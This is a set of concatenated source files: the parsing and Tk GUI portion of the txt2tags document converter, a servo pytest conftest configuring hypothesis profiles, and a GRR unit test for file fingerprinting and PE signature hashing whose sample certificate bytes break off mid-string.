and not regex['table'].search(line) \
and not regex['comment'].search(line):
ret.extend(BLOCK.blockout())
# any NOT quote line (or comment) closes all open quotes
if BLOCK.isblock('quote') \
and not regex['quote'].search(line) \
and not regex['comment'].search(line):
while BLOCK.isblock('quote'):
ret.extend(BLOCK.blockout())
#-------------------------[ Raw Text ]----------------------
# we're already on a raw block
if BLOCK.block() == 'raw':
# closing raw
if regex['blockRawClose'].search(line):
ret.extend(BLOCK.blockout())
continue
# normal raw-inside line
BLOCK.holdadd(line)
continue
# detecting raw block init
if regex['blockRawOpen'].search(line):
ret.extend(BLOCK.blockin('raw'))
continue
# one line verb-formatted text
if regex['1lineRaw'].search(line):
ret.extend(BLOCK.blockin('raw'))
line = regex['1lineRaw'].sub('',line)
BLOCK.holdadd(line)
ret.extend(BLOCK.blockout())
continue
#-----------------[ Verbatim (PRE-formatted) ]--------------
#TIP we'll never support beautifiers inside verbatim
# we're already on a verb block
if BLOCK.block() == 'verb':
# closing verb
if regex['blockVerbClose'].search(line):
ret.extend(BLOCK.blockout())
continue
# normal verb-inside line
BLOCK.holdadd(line)
continue
# detecting verb block init
if regex['blockVerbOpen'].search(line):
ret.extend(BLOCK.blockin('verb'))
f_lastwasblank = 0
continue
# one line verb-formatted text
if regex['1lineVerb'].search(line):
ret.extend(BLOCK.blockin('verb'))
line = regex['1lineVerb'].sub('',line)
BLOCK.holdadd(line)
ret.extend(BLOCK.blockout())
f_lastwasblank = 0
continue
# tables are mapped to verb when target is not table-aware
if not rules['tableable'] and regex['table'].search(line):
if not BLOCK.isblock('verb'):
ret.extend(BLOCK.blockin('verb'))
BLOCK.propset('mapped', 'table')
BLOCK.holdadd(line)
continue
#---------------------[ blank lines ]-----------------------
if regex['blankline'].search(line):
# close open paragraph
if BLOCK.isblock('para'):
ret.extend(BLOCK.blockout())
f_lastwasblank = 1
continue
# close all open quotes
while BLOCK.isblock('quote'):
ret.extend(BLOCK.blockout())
# closing all open lists
if f_lastwasblank: # 2nd consecutive blank
if BLOCK.block()[-4:] == 'list':
BLOCK.holdaddsub('') # helps parser
while BLOCK.depth: # closes list (if any)
ret.extend(BLOCK.blockout())
continue # ignore consecutive blanks
# paragraph (if any) is wanted inside lists also
if BLOCK.block()[-4:] == 'list':
BLOCK.holdaddsub('')
else:
# html: show blank line (needs tag)
if target in ['html','xhtml']:
ret.append(TAGS['paragraphOpen']+\
TAGS['paragraphClose'])
# otherwise we just show a blank line
else:
ret.append('')
f_lastwasblank = 1
continue
#---------------------[ special ]---------------------------
if regex['special'].search(line):
# include command
targ, key, val = ConfigLines().parse_line(
line, 'include', target)
if key:
Debug("Found config '%s', value '%s'"%(
key,val),1,linenr)
incpath = os.path.dirname(CONF['sourcefile'])
incfile = val
err = _('A file cannot include itself (loop!)')
if CONF['sourcefile'] == incfile:
Error("%s: %s"%(err,incfile))
inctype, inclines = get_include_contents(
incfile, incpath)
# verb, raw and passthru are easy
if inctype != 't2t':
ret.extend(BLOCK.blockin(inctype))
BLOCK.holdextend(inclines)
ret.extend(BLOCK.blockout())
else:
# insert include lines into body
#TODO del %!include command call
#TODO include maxdepth limit
bodylines = bodylines[:lineref] \
+inclines \
+bodylines[lineref:]
continue
else:
Debug('Bogus Special Line',1,linenr)
#---------------------[ comments ]--------------------------
# just skip them (if not macro or config)
if regex['comment'].search(line) and not \
regex['date'].match(line):
continue
# valid line, reset blank status
f_lastwasblank = 0
#---------------------[ Horizontal Bar ]--------------------
if regex['bar'].search(line):
# a bar closes a paragraph
if BLOCK.isblock('para'):
ret.extend(BLOCK.blockout())
# we need to close all opened quote blocks
# if bar isn't allowed inside or if not a quote line
if BLOCK.isblock('quote'):
if not rules['barinsidequote'] or \
not regex['quote'].search(line):
while BLOCK.isblock('quote'):
ret.extend(BLOCK.blockout())
# quote + bar: continue processing for quoting
if rules['barinsidequote'] and \
regex['quote'].search(line):
pass
# just quote: save tagged line and we're done
else:
line = get_tagged_bar(line)
if BLOCK.block()[-4:] == 'list':
BLOCK.holdaddsub(line)
elif BLOCK.block():
BLOCK.holdadd(line)
else:
ret.append(line)
continue
#---------------------[ Title ]-----------------------------
#TODO set next blank and set f_lastwasblank or f_lasttitle
if (regex['title'].search(line) or
regex['numtitle'].search(line)) and \
BLOCK.block()[-4:] != 'list':
# a title closes a paragraph
if BLOCK.isblock('para'):
ret.extend(BLOCK.blockout())
TITLE.add(line)
ret.extend(TITLE.get())
f_lastwasblank = 1
continue
#---------------------[ apply masks ]-----------------------
line = MASK.mask(line)
#XXX from here, only block-inside lines will pass
#---------------------[ Quote ]-----------------------------
if regex['quote'].search(line):
# store number of leading TABS
quotedepth = len(regex['quote'].search(line).group(0))
# SGML doesn't support nested quotes
if rules['quotenotnested']: quotedepth = 1
# new quote
if not BLOCK.isblock('quote'):
ret.extend(BLOCK.blockin('quote'))
# new subquotes
while BLOCK.depth < quotedepth:
BLOCK.blockin('quote')
# closing quotes
while quotedepth < BLOCK.depth:
ret.extend(BLOCK.blockout())
#---------------------[ Lists ]-----------------------------
if regex['list'].search(line) or \
regex['numlist'].search(line) or \
regex['deflist'].search(line):
listindent = BLOCK.prop('indent')
listids = string.join(LISTNAMES.keys(), '')
m = re.match('^( *)([%s]) '%listids, line)
listitemindent = m.group(1)
listtype = m.group(2)
listname = LISTNAMES[listtype]
results_box = BLOCK.holdadd
# del list ID (and separate term from definition)
if listname == 'deflist':
term = parse_deflist_term(line)
line = regex['deflist'].sub(term+SEPARATOR,line)
else:
line = regex[listname].sub(SEPARATOR,line)
# don't cross depth limit
maxdepth = rules['listmaxdepth']
if maxdepth and BLOCK.depth == maxdepth:
if len(listitemindent) > len(listindent):
listitemindent = listindent
# open mother list or sublist
if BLOCK.block()[-4:] != 'list' or \
len(listitemindent) > len(listindent):
ret.extend(BLOCK.blockin(listname))
BLOCK.propset('indent',listitemindent)
# closing sublists
while len(listitemindent) < len(BLOCK.prop('indent')):
ret.extend(BLOCK.blockout())
#---------------------[ Table ]-----------------------------
#TODO escape undesired format inside table
#TODO add pm6 target
if regex['table'].search(line):
if not BLOCK.isblock('table'): # first table line!
ret.extend(BLOCK.blockin('table'))
BLOCK.tableparser.__init__(line)
tablerow = TableMaster().parse_row(line)
BLOCK.tableparser.add_row(tablerow) # save config
# maintain line to unmask and inlines
line = string.join(tablerow['cells'], SEPARATOR)
#---------------------[ Paragraph ]-------------------------
if not BLOCK.block(): # new para!
ret.extend(BLOCK.blockin('para'))
############################################################
############################################################
############################################################
#---------------------[ Final Parses ]----------------------
# the target-specific special char escapes for body lines
line = doEscape(target,line)
line = add_inline_tags(line)
line = MASK.undo(line)
#---------------------[ Hold or Return? ]-------------------
### now we must choose here to put the parsed line
#
if not results_box:
# list item extra lines
if BLOCK.block()[-4:] == 'list':
results_box = BLOCK.holdaddsub
# other blocks
elif BLOCK.block():
results_box = BLOCK.holdadd
# no blocks
else:
line = doFinalEscape(target, line)
results_box = ret.append
results_box(line)
# EOF: close any open para/verb/lists/table/quotes
Debug('EOF',2)
while BLOCK.block():
ret.extend(BLOCK.blockout())
# if CSS, enclose body inside DIV
if TAGS['bodyOpenCss'] and config['css-suggar']:
ret.insert(0, TAGS['bodyOpenCss'])
ret.append(TAGS['bodyCloseCss'])
if CONF['toc-only']: ret = []
marked_toc = TITLE.dump_marked_toc(CONF['toc-level'])
return ret, marked_toc
##############################################################################
################################### GUI ######################################
##############################################################################
#
# tk help: http://python.org/topics/tkinter/
# /usr/lib/python*/lib-tk/Tkinter.py
#
# grid table : row=0, column=0, columnspan=2, rowspan=2
# grid align : sticky='n,s,e,w' (North, South, East, West)
# pack place : side='top,bottom,right,left'
# pack fill : fill='x,y,both,none', expand=1
# pack align : anchor='n,s,e,w' (North, South, East, West)
# padding : padx=10, pady=10, ipadx=10, ipady=10 (internal)
# checkbox : offvalue is return if the _user_ deselected the box
# label align: justify=left,right,center
def load_GUI_resources():
"Load all extra modules and methods used by GUI"
global askopenfilename, showinfo, showwarning, showerror, Tkinter
from tkFileDialog import askopenfilename
from tkMessageBox import showinfo,showwarning,showerror
import Tkinter
class Gui:
"Graphical Tk Interface"
def __init__(self, conf={}):
self.root = Tkinter.Tk() # mother window, come to butthead
self.root.title(my_name) # window title bar text
self.window = self.root # variable "focus" for inclusion
self.row = 0 # row count for grid()
self.action_lenght = 150 # left column lenght (pixel)
self.frame_margin = 10 # frame margin size (pixel)
self.frame_border = 6 # frame border size (pixel)
# the default Gui colors, can be changed by %!guicolors
self.dft_gui_colors = ['blue','white','lightblue','black']
self.gui_colors = []
self.bg1 = self.fg1 = self.bg2 = self.fg2 = ''
# on Tk, vars need to be set/get using setvar()/get()
self.infile = self.setvar('')
self.target = self.setvar('')
self.target_name = self.setvar('')
# the checks appearance order
self.checks = [
'headers','enum-title','toc','mask-email',
'toc-only','stdout']
# creating variables for all checks
for check in self.checks:
setattr(self, 'f_'+check, self.setvar(''))
# load RC config
self.conf = {}
if conf: self.load_config(conf)
def load_config(self, conf):
self.conf = conf
self.gui_colors = conf.get('guicolors') or self.dft_gui_colors
self.bg1, self.fg1, self.bg2, self.fg2 = self.gui_colors
self.root.config(bd=15,bg=self.bg1)
### config as dic for python 1.5 compat (**opts don't work :( )
def entry(self, **opts): return Tkinter.Entry(self.window, opts)
def label(self, txt='', bg=None, **opts):
opts.update({'text':txt,'bg':bg or self.bg1})
return Tkinter.Label(self.window, opts)
def button(self,name,cmd,**opts):
opts.update({'text':name,'command':cmd})
return Tkinter.Button(self.window, opts)
def check(self,name,checked=0,**opts):
bg, fg = self.bg2, self.fg2
opts.update({
'text':name, 'onvalue':1, 'offvalue':0,
'activeforeground':fg, 'fg':fg,
'activebackground':bg, 'bg':bg,
'highlightbackground':bg, 'anchor':'w'
})
chk = Tkinter.Checkbutton(self.window, opts)
if checked: chk.select()
chk.grid(columnspan=2, sticky='w', padx=0)
def menu(self,sel,items):
return apply(Tkinter.OptionMenu,(self.window,sel)+tuple(items))
# handy auxiliar functions
def action(self, txt):
self.label(txt, fg=self.fg1, bg=self.bg1,
wraplength=self.action_lenght).grid(column=0,row=self.row)
def frame_open(self):
self.window = Tkinter.Frame(self.root,bg=self.bg2,
borderwidth=self.frame_border)
def frame_close(self):
self.window.grid(column=1, row=self.row, sticky='w',
padx=self.frame_margin)
self.window = self.root
self.label('').grid()
self.row = self.row + 2 # update row count
def target_name2key(self):
name = self.target_name.get()
target = filter(lambda x: TARGET_NAMES[x] == name, TARGETS)
try : key = target[0]
except: key = ''
self.target = self.setvar(key)
def target_key2name(self):
key = self.target.get()
name = TARGET_NAMES.get(key) or key
self.target_name = self.setvar(name)
def exit(self): self.root.destroy()
def setvar(self, val): z = Tkinter.StringVar() ; z.set(val) ; return z
def askfile(self):
ftypes= [(_('txt2tags files'),('*.t2t','*.txt')),
(_('All files'),'*')]
newfile = askopenfilename(filetypes=ftypes)
if newfile:
self.infile.set(newfile)
newconf = process_source_file(newfile)[0]
newconf = ConfigMaster().sanity(newconf, gui=1)
# restate all checkboxes after file selection
#TODO how to make a refresh without killing it?
self.root.destroy()
self.__init__(newconf)
self.mainwindow()
def scrollwindow(self, txt='no text!', title=''):
# create components
win = Tkinter.Toplevel() ; win.title(title)
frame = Tkinter.Frame(win)
scroll = Tkinter.Scrollbar(frame)
text = Tkinter.Text(frame,yscrollcommand=scroll.set)
button = Tkinter.Button(win)
# config
text.insert(Tkinter.END, string.join(txt,'\n'))
scroll.config(command=text.yview)
button.config(text=_('Close'), command=win.destroy)
button.focus_set()
# packing
text.pack(side='left',fill='both')
scroll.pack(side='right',fill='y')
frame.pack()
button.pack(ipadx=30)
def runprogram(self):
global CMDLINE_RAW
# prepare
self.target_name2key()
infile, target = self.infile.get(), self.target.get()
# sanity
if not target:
showwarning(my_name,_("You must select a target type!"))
return
if not infile:
showwarning(my_name,
_("You must provide the source file location!"))
return
# compose cmdline
guiflags = []
real_cmdline_conf = ConfigMaster(CMDLINE_RAW).parse()
if real_cmdline_conf.has_key('infile'):
del real_cmdline_conf['infile']
if real_cmdline_conf.has_key('target'):
del real_cmdline_conf['target']
real_cmdline = CommandLine().compose_cmdline(real_cmdline_conf)
default_outfile = ConfigMaster().get_outfile_name(
{'sourcefile':infile, 'outfile':'', 'target':target})
for opt in self.checks:
val = int(getattr(self, 'f_%s'%opt).get() or "0")
if opt == 'stdout': opt = 'outfile'
on_config = self.conf.get(opt) or 0
on_cmdline = real_cmdline_conf.get(opt) or 0
if opt == 'outfile':
if on_config == STDOUT: on_config = 1
else: on_config = 0
if on_cmdline == STDOUT: on_cmdline = 1
else: on_cmdline = 0
if val != on_config or (
val == on_config == on_cmdline and
real_cmdline_conf.has_key(opt)):
if val:
# was not set, but user selected on GUI
Debug("user turned ON: %s"%opt)
if opt == 'outfile': opt = '-o-'
else: opt = '--%s'%opt
else:
# was set, but user deselected on GUI
Debug("user turned OFF: %s"%opt)
if opt == 'outfile':
opt = "-o%s"%default_outfile
else: opt = '--no-%s'%opt
guiflags.append(opt)
cmdline = [my_name, '-t', target] +real_cmdline \
+guiflags +[infile]
Debug('Gui/Tk cmdline: %s'%cmdline,5)
# run!
cmdline_raw_orig = CMDLINE_RAW
try:
# fake the GUI cmdline as the real one, and parse file
CMDLINE_RAW = CommandLine().get_raw_config(cmdline[1:])
data = process_source_file(infile)
# on GUI, convert_* returns the data, not finish_him()
outlist, config = convert_this_files([data])
# on GUI and STDOUT, finish_him() returns the data
result = finish_him(outlist, config)
# show outlist in s a nice new window
if result:
outlist, config = result
title = _('%s: %s converted to %s')%(
my_name, os.path.basename(infile),
string.upper(config['target']))
self.scrollwindow(outlist, title)
# show the "file saved" message
else:
msg = "%s\n\n %s\n%s\n\n %s\n%s"%(
_('Conversion done!'),
_('FROM:'), infile,
_('TO:'), config['outfile'])
showinfo(my_name, msg)
except ZeroDivisionError: # common error, not quit
pass
except: # fatal error
ShowTraceback()
print _('Sorry! txt2tags-Tk Fatal Error.')
errmsg = '%s\n\n%s\n %s'%(
_('Unknown error occurred.'),
_('Please send the Error Traceback to the author:'),
my_email)
showerror(_('%s FATAL ERROR!')%my_name,errmsg)
self.exit()
CMDLINE_RAW = cmdline_raw_orig
def mainwindow(self):
self.infile.set(self.conf.get('sourcefile') or '')
self.target.set(self.conf.get('target') or \
_('-- select one --'))
outfile = self.conf.get('outfile')
if outfile == STDOUT: # map -o-
self.conf['stdout'] = 1
if self.conf.get('headers') == None:
self.conf['headers'] = 1 # map default
action1 = _("Enter the source file location:")
action2 = _("Choose the target document type:")
action3 = _("Some options you may check:")
action4 = _("Some extra options:")
checks_txt = {
'headers' : _("Include headers on output"),
'enum-title': _("Number titles (1, 1.1, 1.1.1, etc)"),
'toc' : _("Do TOC also (Table of Contents)"),
'mask-email': _("Hide e-mails from SPAM robots"),
'toc-only' : _("Just do TOC, nothing more"),
'stdout' : _("Dump to screen (Don't save target file)")
}
targets_menu = map(lambda x: TARGET_NAMES[x], TARGETS)
# header
self.label("%s %s"%(string.upper(my_name), my_version),
bg=self.bg2, fg=self.fg2).grid(columnspan=2, ipadx=10)
self.label(_("ONE source, MULTI targets")+'\n%s\n'%my_url,
bg=self.bg1, fg=self.fg1).grid(columnspan=2)
self.row = 2
# choose input file
self.action(action1) ; self.frame_open()
e_infile = self.entry(textvariable=self.infile,width=25)
e_infile.grid(row=self.row, column=0, sticky='e')
if not self.infile.get(): e_infile.focus_set()
self.button(_("Browse"), self.askfile).grid(
row=self.row, column=1, sticky='w', padx=10)
# show outfile name, style and encoding (if any)
txt = ''
if outfile:
txt = outfile
if outfile == STDOUT: txt = _('<screen>')
l_output = self.label(_('Output: ')+txt,
fg=self.fg2,bg=self.bg2)
l_output.grid(columnspan=2, sticky='w')
for setting in ['style','encoding']:
if self.conf.get(setting):
name = string.capitalize(setting)
val = self.conf[setting]
self.label('%s: %s'%(name, val),
fg=self.fg2, bg=self.bg2).grid(
columnspan=2, sticky='w')
# choose target
self.frame_close() ; self.action(action2)
self.frame_open()
self.target_key2name()
self.menu(self.target_name, targets_menu).grid(
columnspan=2, sticky='w')
# options checkboxes label
self.frame_close() ; self.action(action3)
self.frame_open()
# compose options check boxes, example:
# self.check(checks_txt['toc'],1,variable=self.f_toc)
for check in self.checks:
# extra options label
if check == 'toc-only':
self.frame_close() ; self.action(action4)
self.frame_open()
txt = checks_txt[check]
var = getattr(self, 'f_'+check)
checked = self.conf.get(check)
self.check(txt,checked,variable=var)
self.frame_close()
# spacer and buttons
self.label('').grid() ; self.row = self.row + 1
b_quit = self.button(_("Quit"), self.exit)
b_quit.grid(row=self.row, column=0, sticky='w', padx=30)
b_conv = self.button(_("Convert!"), self.runprogram)
b_conv.grid(row=self.row, column=1, sticky='e', padx=30)
if self.target.get() and self.infile.get():
b_conv.focus_set()
# as documentation told me
if sys.platform[:3] == 'win':
self.root.iconify()
self.root.update()
self.root.deiconify()
self.root.mainloop()
##############################################################################
##############################################################################
def exec_command_line(user_cmdline=[]):
global CMDLINE_RAW, RC_RAW, DEBUG, VERBOSE, GUI, Error
# extract command line data
cmdline_data = user_cmdline or sys.argv[1:]
CMDLINE_RAW = CommandLine().get_raw_config(cmdline_data)
cmdline_parsed = ConfigMaster(CMDLINE_RAW).parse()
DEBUG = cmdline_parsed.get('debug' ) or 0
VERBOSE = cmdline_parsed.get('verbose') or 0
GUI = cmdline_parsed.get('gui' ) or 0
infiles = cmdline_parsed.get('infile' ) or []
Message(_("Txt2tags %s processing begins")%my_version,1)
# the easy ones
if cmdline_parsed.get('help' ): Quit(USAGE)
if cmdline_parsed.get('version'): Quit(VERSIONSTR)
# multifile haters
if len(infiles) > 1:
errmsg=_("Option --%s can't be used with multiple input files")
for option in ['gui','dump-config']:
if cmdline_parsed.get(option):
Error(errmsg%option)
Debug("system platform: %s"%sys.platform)
Debug("line break char: %s"%repr(LB))
Debug("command line: %s"%sys.argv)
Debug("command line raw config: %s"%CMDLINE_RAW,1)
# extract RC file config
if cmdline_parsed.get('rc') == 0:
Message(_("Ignoring user configuration file"),1)
else:
rc_file = get_rc_path()
if rc_file:
Message(_("Loading user configuration file"),1)
RC_RAW = ConfigLines(file=rc_file).get_raw_config()
Debug("rc file: %s"%rc_file)
Debug("rc file raw config: %s"%RC_RAW,1)
# get all infiles config (if any)
infiles_config = get_infiles_config(infiles)
# is GUI available?
# try to load and start GUI interface for --gui
# if program was called with no arguments, try GUI also
if GUI or not infiles:
try:
load_GUI_resources()
Debug("GUI resources OK (Tk module is installed)")
winbox = Gui()
Debug("GUI display OK")
GUI = 1
except:
Debug("GUI Error: no Tk module or no DISPLAY")
GUI = 0
# user forced --gui, but it's not available
if cmdline_parsed.get('gui') and not GUI:
ShowTraceback()
Error("Sorry, I can't run my Graphical Interface - GUI\n"
"- Check if Python Tcl/Tk module is installed (Tkinter)\n"
"- Make sure you are in a graphical environment (like X)")
# Okay, we will use GUI
if GUI:
Message(_("We are on GUI interface"),1)
# redefine Error function to raise exception instead sys.exit()
def Error(msg):
showerror(_('txt2tags ERROR!'), msg)
raise ZeroDivisionError
# if no input file, get RC+cmdline config, else full config
if not infiles:
gui_conf = ConfigMaster(RC_RAW+CMDLINE_RAW).parse()
else:
try : gui_conf = infiles_config[0][0]
except: gui_conf = {}
# sanity is needed to set outfile and other things
gui_conf = ConfigMaster().sanity(gui_conf, gui=1)
Debug("GUI config: %s"%gui_conf,5)
# insert config and populate the nice window!
winbox.load_config(gui_conf)
winbox.mainwindow()
# console mode rocks forever!
else:
Message(_("We are on Command Line interface"),1)
# called with no arguments, show error
if not infiles: Error(_('Missing input file (try --help)'))
convert_this_files(infiles_config)
Message(_("Txt2tags finished sucessfuly"),1)
sys.exit(0)
if __name__ == '__main__':
exec_command_line()
# vim: ts=8
|
charlesvdv/servo
|
refs/heads/master
|
tests/wpt/css-tests/tools/conftest.py
|
83
|
import platform
import os
from hypothesis import settings, HealthCheck
impl = platform.python_implementation()
settings.register_profile("ci", settings(max_examples=1000))
settings.register_profile("ci_pypy", settings(max_examples=1000,
suppress_health_check=[HealthCheck.too_slow]))
settings.register_profile("pypy", settings(suppress_health_check=[HealthCheck.too_slow]))
settings.load_profile(os.getenv("HYPOTHESIS_PROFILE",
"default" if impl != "PyPy" else "pypy"))
|
dunkhong/grr
|
refs/heads/master
|
grr/core/grr_response_core/lib/fingerprint_test.py
|
2
|
#!/usr/bin/env python
"""Tests for config_lib classes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
from absl.testing import absltest
from grr_response_core.lib import fingerprint
from grr_response_core.lib import package
class FingerprinterTest(absltest.TestCase):
def testReasonableInterval(self):
# Check if the limit on maximum blocksize for processing still holds.
dummy = io.BytesIO(b'')
fp = fingerprint.Fingerprinter(dummy)
big_finger = fingerprint.Finger(None, [fingerprint.Range(0, 1000001)], None)
fp.fingers.append(big_finger)
start, stop = fp._GetNextInterval()
self.assertEqual(0, start)
self.assertEqual(1000000, stop)
def testAdjustments(self):
dummy = io.BytesIO(b'')
fp = fingerprint.Fingerprinter(dummy)
big_finger = fingerprint.Finger(None, [fingerprint.Range(10, 20)], None)
fp.fingers.append(big_finger)
# The remaining range should not yet be touched...
fp._AdjustIntervals(9, 10)
self.assertEqual([fingerprint.Range(10, 20)], fp.fingers[0].ranges)
# Trying to consume into the range. Blow up.
self.assertRaises(RuntimeError, fp._AdjustIntervals, 9, 11)
# We forgot a byte. Blow up.
self.assertRaises(RuntimeError, fp._AdjustIntervals, 11, 12)
# Consume a byte
fp._AdjustIntervals(10, 11)
self.assertEqual([fingerprint.Range(11, 20)], fp.fingers[0].ranges)
# Consumed too much. Blow up.
self.assertRaises(RuntimeError, fp._AdjustIntervals, 11, 21)
# Consume exactly.
fp._AdjustIntervals(11, 20)
self.assertEmpty(fp.fingers[0].ranges)
class MockHasher(object):
def __init__(self):
self.seen = b''
def update(self, content): # pylint: disable=g-bad-name
self.seen += content
def testHashBlock(self):
# Does it invoke a hash function?
dummy = b'12345'
fp = fingerprint.Fingerprinter(io.BytesIO(dummy))
big_finger = fingerprint.Finger(None, [fingerprint.Range(0, len(dummy))],
None)
hasher = self.MockHasher()
big_finger.hashers = [hasher]
fp.fingers.append(big_finger)
# Let's process the block
fp._HashBlock(dummy, 0, len(dummy))
self.assertEqual(hasher.seen, dummy)
def testSampleDataParsedCorrectly(self):
for fname, expected in self.SAMPLE_LIST.items():
path = package.ResourcePath(
'grr-response-test',
os.path.join('grr_response_test', 'test_data', 'fingerprint', fname))
with io.open(path, 'rb') as f:
fp = fingerprint.Fingerprinter(f)
fp.EvalGeneric()
fp.EvalPecoff()
result = fp.HashIt()
self.assertCountEqual(result, expected,
'Hashing results for %s do not match.' % fname)
# pyformat: disable
SAMPLE_DATA_1 = [{
'sha256':
b"\xf2\xa7\xccd[\x96\x94l\xc6[\xf6\x0e\x14\xe7\r\xc0\x9c\x84\x8d'\xc7\x94<\xe5\xde\xa0\xc0\x1ak\x864\x80",
'sha512':
b"-\x04\xe5*]N\xaa\xab\x96\xbefQ\xb7\xa0d\x13\xe04w\x84\x0fg^\xe7>$7a\xb2\x19\x19\xe5&\x8ew+\x99\xe2\xfc\xb5\xb9`\xd7\x89\xc5>\xbc\x1b\xff\x83`\x1d''2\xd4KaeS\xe1tj\x0f",
'name':
'generic',
'md5':
b'\xb5\xb8\xb5\xef.\\\xb3M\xf8\xdc\xf8\x83\x1e54\xfa',
'sha1':
b'\x98\xcc;\x8f81\x1a\xbf\xdfW{\xe4\x03\xff\x9ft\xaaU\xf7E'
}, {
'SignedData': [(
512, 2,
b'0\x82\x1c4\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x1c%0\x82\x1c!\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x06\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x03\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x00b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\t\x06\x05+\x0e\x03\x02\x1a\x05\x00\x04\x14\x9b\xd4D\xd5\x8bY\xcc\xa82\xbb_\xc9\x11\xf8\x1flf\xb4\x0f\xcc\xa0\x82\x17\t0\x82\x04\xbb0\x82\x03\xa3\xa0\x03\x02\x01\x02\x02\na\x04\xcai\x00\x00\x00\x00\x00\x080\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000w1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp PCA0\x1e\x17\r070605220321Z\x17\r120605221321Z0\x81\xa41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1\'0%\x06\x03U\x04\x0b\x13\x1enCipher DSE ESN:A5B0-CDE0-DC941%0#\x06\x03U\x04\x03\x13\x1cMicrosoft Time-Stamp Service0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xaf\xf8Z\xf64\xb1\xa2\x0f\x8e\xac\xcf\xfc\x18\xf0\xad%\rq\xbb_[\xb7;7A\x13$\x1c\xea#\xc5\xae\xac\x99\xc0\xdc\xa6#\xf0\xca\xa9302j/\x9a!B\x02\t&Y\x9bP\xe9Wq\x8bg\xeb\x97\xe8\x04s\x8bx\xb1\x98@F\xa3Z\x01(\x00\x16\xa0\xda\xc5N\x8b\xa9\tT\x911\x9c\xff\xc4\x90\x95E\x07\x1d\x80(\x05\x06q\x80\xcb\xac8ga\xec\xc2_\x16\x9d\x7f\xb0?\xd1*\xf72os=|n\x986\x9a\x86\xee\x008\xee\x17\xecOU3F\x81z@\xdc\xa5\xf5\xd2#\x86]+3O$H\x93\x1a\xb1\xb4~\xcf\xdf3\x1b\xbf\xd5[\xc6/\x13\xf3\xe6\x84\xb7N\x93\x98\xbc\x00\xeb\\\x1di\xc5\xc8\xc8\xd2\xc4<\xb0\x00\x14\xe3\xb2\x9c\xf9\xa1\x1e\t\xdc\xd5\xf5m|213\xb2\x8fY\x9b\xfe\xca\x1f]"N\xba\x12\x1d\xf0g\xc3\x04\x89K\x7f\x03\xfd}\xd7T\x81\x03]I\xf5\x1e\xab ~\xd2e\xb4q\x19\xe8L}\xc6\x94\xbd\x85\x91mPZ\xc3\xa9\x02\x03\x01\x00\x01\xa3\x82\x01\x190\x82\x01\x150\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x9e\x8f\xa8t\xc1B\xee\x18\xcd=\xbd\xe9\xd6\xee\'\xb0\xc754g0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14#4\xf8\xd9RFp\n\xed@\xfbv\xfb\xb3+\xb0\xc35\xb3\x0f0T\x06\x03U\x1d\x1f\x04M0K0I\xa0G\xa0E\x86Chttp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04L0J0H\x06\x08+\x06\x01\x05\x05\x070\x02\x86<http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x06\xc00\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00g\xa5\xdf(Q\xdcH\x83\xfd\xc6e\xf9]\xfaf\xaa\xb2\x8d\xa7V\x9d\xa2H\xbe2\xacm\x97\x0fO\x0cD\xbb\xbb\x18\xf4\x90\xe7\xe2}\xc5t\x00\xd6\x86\xf3\x91\xc0\xd0\xd1\x05\x89^b\x8b\xfah\xf7e\xcf\xe6S\xa9\xdft\x12!\xad\x8c\x15\xb4\xa6\xcaC\x93\xc9k\xe1J\xb2\xed\x0f\xce\xb4\x8a:\x7f\xf7\xb5\xcc\xbc\x12\x9a{\xcf\x04\xc4?\xd9\n,u<\x92\x9e\xcf\x066b\x0e\x02\x17\xe6\x99\'\xf7\xfbq\xef\xffZzaU\xba\xba\x98\x87\xebq\xacv\xf5\xe8\x86\x9f6gPAx\xfc3\xa4\xd5is\x01\xc8p#k|\xa3W\xc8h\x07\xe4[A\xc1\xf8&\xfdiI\x03\x99\xd6\xaf\xc9?\xa4\xf5\x9cL\xf9\n\x9d\xd2\xcdK\xbf}\xfa\x16\x90\xec;qI\xfe\x04\x15\xca\xe2j\xdai\x0b\xb4\x93>4\xfe\xca\xec\x80I\xe4\xb2t\x18\xcc\x91\xe7>N\xb7{\xf5@\x8fd[\xd4P\xd59MS\xcd\xbe\xd4^G\x82[\xd1Zz\x99.Fpk\x07\x85\rl\t\x13c\x0fu0\x82\x05\x960\x82\x04~\xa0\x03\x02\x01\x02\x02\na\x01\xc6\xc1\x00\x00\x00\x00\x00\x070\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\x811\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x03\x13"Microsoft Windows Verification 